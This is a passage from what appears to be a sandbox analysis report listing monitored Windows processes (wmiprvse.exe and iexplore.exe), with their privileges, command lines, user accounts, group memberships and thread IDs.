id = 101 os_tid = 0xb38 Thread: id = 102 os_tid = 0xb88 Thread: id = 103 os_tid = 0xb58 Thread: id = 105 os_tid = 0x74c Thread: id = 106 os_tid = 0x158 Thread: id = 107 os_tid = 0x388 Thread: id = 108 os_tid = 0xa78 Thread: id = 111 os_tid = 0x34c Thread: id = 112 os_tid = 0x6c8 Thread: id = 113 os_tid = 0x324 Thread: id = 114 os_tid = 0xbe4 Thread: id = 115 os_tid = 0xbe8 Thread: id = 116 os_tid = 0xa44 Thread: id = 117 os_tid = 0xb18 Thread: id = 118 os_tid = 0xa7c Process: id = "3" image_name = "wmiprvse.exe" filename = "c:\\windows\\system32\\wbem\\wmiprvse.exe" page_root = "0x60f6c000" os_pid = "0xa94" os_integrity_level = "0x4000" os_privileges = "0x60800000" monitor_reason = "rpc_server" parent_id = "2" os_parent_pid = "0x250" cmd_line = "C:\\Windows\\system32\\wbem\\wmiprvse.exe -secured -Embedding" cur_dir = "C:\\Windows\\system32\\" os_username = "NT AUTHORITY\\Network Service" bitness = "32" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "WMI (Network Service)" [0xf], "NT AUTHORITY\\Logon Session 00000000:00046ed0" [0xc000000f] Thread: id = 56 os_tid = 0xbf8 Thread: id = 57 os_tid = 0xabc Thread: id = 58 os_tid = 0xab4 Thread: id = 59 os_tid = 0xab0 Thread: id = 60 os_tid = 0xaac Thread: id = 61 os_tid = 0xaa8 Thread: id = 62 os_tid = 0xaa4 Thread: id = 63 os_tid = 0xaa0 Thread: id = 64 os_tid = 0xa9c Thread: id = 65 os_tid = 0xa98 Thread: id = 109 os_tid = 0x314 Process: id = "4" image_name = "wmiprvse.exe" filename = "c:\\windows\\system32\\wbem\\wmiprvse.exe" page_root = "0x63967000" os_pid = "0xa48" os_integrity_level = "0x4000" os_privileges = "0xe60b1e990" monitor_reason = "rpc_server" parent_id = "2" os_parent_pid = "0x250" cmd_line = "C:\\Windows\\system32\\wbem\\wmiprvse.exe -Embedding" cur_dir = "C:\\Windows\\system32\\" os_username = "NT AUTHORITY\\SYSTEM" bitness = "32" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\BDESVC" [0xa], "NT SERVICE\\BITS" [0xa], "NT SERVICE\\CertPropSvc" [0xa], "NT SERVICE\\EapHost" [0xa], "NT SERVICE\\hkmsvc" [0xa], "NT SERVICE\\IKEEXT" [0xa], "NT SERVICE\\iphlpsvc" [0xe], "NT SERVICE\\LanmanServer" [0xe], "NT SERVICE\\MMCSS" [0xe], "NT SERVICE\\MSiSCSI" [0xa], "NT SERVICE\\RasAuto" [0xa], "NT SERVICE\\RasMan" [0xa], "NT SERVICE\\RemoteAccess" [0xa], "NT SERVICE\\Schedule" [0xe], "NT SERVICE\\SCPolicySvc" [0xa], "NT SERVICE\\SENS" [0xe], "NT SERVICE\\SessionEnv" [0xa], "NT SERVICE\\SharedAccess" [0xa], "NT SERVICE\\ShellHWDetection" [0xe], "NT SERVICE\\wercplsupport" [0xa], "NT SERVICE\\Winmgmt" [0xe], "NT SERVICE\\wuauserv" [0xa], "NT AUTHORITY\\Logon Session 00000000:0000d057" [0xc0000007], "LOCAL" [0x7], "BUILTIN\\Administrators" [0xe] Thread: id = 66 os_tid = 0x35c Thread: id = 67 os_tid = 0xa74 Thread: id = 68 os_tid = 0xa68 Thread: id = 69 os_tid = 0xa64 Thread: id = 70 os_tid = 0xa60 Thread: id = 71 os_tid = 0xa5c Thread: id = 72 os_tid = 0xa58 Thread: id = 73 os_tid = 0xa54 Thread: id = 74 os_tid = 0xa4c Thread: id = 110 os_tid = 0x348 Process: id = "5" image_name = "wmiprvse.exe" filename = "c:\\windows\\syswow64\\wbem\\wmiprvse.exe" page_root = "0x32091000" os_pid = "0x560" os_integrity_level = "0x4000" os_privileges = "0x60800000" monitor_reason = "rpc_server" parent_id = "2" os_parent_pid = "0x250" cmd_line = "C:\\Windows\\sysWOW64\\wbem\\wmiprvse.exe -secured -Embedding" cur_dir = "C:\\Windows\\system32\\" os_username = "NT AUTHORITY\\Local Service" bitness = "32" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "WMI (Local Service)" [0xf], "NT AUTHORITY\\Logon Session 00000000:0005c7ab" [0xc000000f] Thread: id = 75 os_tid = 0x208 Thread: id = 76 os_tid = 0x1c0 Thread: id = 77 os_tid = 0x174 Thread: id = 78 os_tid = 0x5d8 Thread: id = 79 os_tid = 0x798 Thread: id = 80 os_tid = 0x138 Thread: id = 81 os_tid = 0x48c Thread: id = 104 os_tid = 0xb2c Process: id = "6" image_name = "iexplore.exe" filename = "c:\\program files (x86)\\internet explorer\\iexplore.exe" page_root = "0x32ad9000" os_pid = "0x248" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "rpc_server" parent_id = "1" os_parent_pid = "0x648" cmd_line = "\"C:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\" SCODEF:1608 CREDAT:79873" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 82 os_tid = 0x8c4 Thread: id = 83 os_tid = 0x8b4 Thread: id = 84 os_tid = 0x8a4 Thread: id = 85 os_tid = 0x894 Thread: id = 86 os_tid = 0x864 Thread: id = 87 os_tid = 0x854 Thread: id = 88 os_tid = 0x844 Thread: id = 89 os_tid = 0x834 Thread: id = 90 os_tid = 0x824 Thread: id = 91 os_tid = 0x814 Thread: id = 92 os_tid = 0x804 Thread: id = 93 os_tid = 0x788 Thread: id = 94 os_tid = 0x31c Thread: id = 95 os_tid = 0x8f8 Thread: id = 96 os_tid = 0x908 Thread: id = 97 os_tid = 0x918 Thread: id = 98 os_tid = 0x928 Thread: id = 120 os_tid = 0x1c4